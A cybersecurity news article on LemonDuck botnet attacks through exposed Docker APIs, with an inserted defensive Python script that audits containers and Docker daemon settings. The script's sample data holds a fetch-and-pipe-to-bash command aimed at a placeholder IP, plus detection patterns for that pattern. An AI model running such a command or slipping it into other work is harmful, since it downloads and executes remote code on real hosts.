According to researchers from security firm CrowdStrike, an unknown threat actor is using the LemonDuck cryptomining botnet to target servers via ProxyLogon.
By looking for exposed Docker APIs for initial access, the attackers are then able to run a malicious container by using a custom Docker ENTRYPOINT to download a “core.png” image file, which disguises a Bash script.
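As an added defensive illustration (not code from the article or from CrowdStrike), the script below audits a host for the two conditions this paragraph describes: a Docker daemon exposed over plain TCP, and a container whose start command fetches a file with an image extension and hands it to a shell. The container records and daemon.json are constructed samples in the shape of `docker inspect` output; the IP address is a documentation address and the only detail taken from the article is the "core.png" file name.

```python
import re

# Constructed samples: two container configs shaped like `docker inspect`
# output (Config.Image / Config.Entrypoint / Config.Cmd) and a daemon.json.
# Values are assumptions for this example, not indicators from the report.
SAMPLE_CONTAINERS = [
    {"Id": "c1", "Config": {"Image": "alpine",
        "Entrypoint": ["/bin/sh", "-c"],
        "Cmd": ["wget -qO- http://203.0.113.10/core.png | bash"]}},
    {"Id": "c2", "Config": {"Image": "nginx:1.25",
        "Entrypoint": ["/docker-entrypoint.sh"],
        "Cmd": ["nginx", "-g", "daemon off;"]}},
]
SAMPLE_DAEMON_JSON = {"hosts": ["unix:///var/run/docker.sock",
                                "tcp://0.0.0.0:2375"]}

DOWNLOADER = re.compile(r"\b(curl|wget)\b")
IMAGE_URL = re.compile(r"https?://\S+\.(png|jpe?g|gif|bmp)\b", re.I)
SHELL_EXEC = re.compile(r"(\|\s*(ba)?sh\b|\b(ba)?sh\s+-c\b|\bchmod\s+\+x\b)")

def flag_container(container):
    """Return reasons a container's start command resembles the
    download-an-'image'-then-execute pattern; empty list if clean."""
    cfg = container["Config"]
    cmdline = " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))
    reasons = []
    if DOWNLOADER.search(cmdline) and IMAGE_URL.search(cmdline):
        reasons.append("entrypoint downloads a file with an image extension")
        if SHELL_EXEC.search(cmdline):
            reasons.append("downloaded content is handed to a shell")
    return reasons

def flag_daemon_hosts(daemon_json):
    """Return TCP listeners from daemon.json that lack TLS client
    verification, i.e. the exposed-API condition used for initial access."""
    if daemon_json.get("tlsverify"):
        return []
    return [h for h in daemon_json.get("hosts", []) if h.startswith("tcp://")]

def audit(containers, daemon_json):
    """Map each finding source (container Id or 'daemon') to its reasons."""
    findings = {c["Id"]: flag_container(c) for c in containers}
    findings["daemon"] = flag_daemon_hosts(daemon_json)
    return {k: v for k, v in findings.items() if v}

if __name__ == "__main__":
    for name, reasons in audit(SAMPLE_CONTAINERS, SAMPLE_DAEMON_JSON).items():
        print(name, "->", "; ".join(reasons))
```

On a live host the same functions can be fed the output of `docker inspect` and the contents of `/etc/docker/daemon.json`.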
After gaining initial access, the attackers are able to perform a number of actions: abuse EternalBlue, BlueKeep or similar exploits to escalate privileges, install cryptominers, and move laterally across the compromised networks.
Of all the different cryptominers, the attackers are predominantly using XMRig to mine Monero, a privacy-oriented cryptocurrency which is said to be more difficult to trace.
The researchers further explained that LemonDuck comes with a file called “a.asp”, which has the ability to disable the aliyun service on Alibaba’s Cloud, and thus evade detection.
On why the campaign was not detected sooner, the researchers noted the threat actors weren’t mass scanning public IP ranges for exploitable attack surfaces, but rather moving laterally through LemonDuck, looking for SSH keys on the filesystem. Once they find SSH keys, they use them to log into the servers and run all of the aforementioned malicious scripts.
Cryptominers have become extremely popular in these last few years, with the rising price of cryptocurrencies and ease with which they can be sold on the market attracting attention from honest and dishonest actors alike.
Sead is a seasoned freelance journalist based in Sarajevo, Bosnia and Herzegovina. He writes about IT (cloud, IoT, 5G, VPN) and cybersecurity (ransomware, data breaches, laws and regulations). In his career, spanning more than a decade, he’s written for numerous media outlets, including Al Jazeera Balkans. He’s also held several modules on content writing for Represent Communications.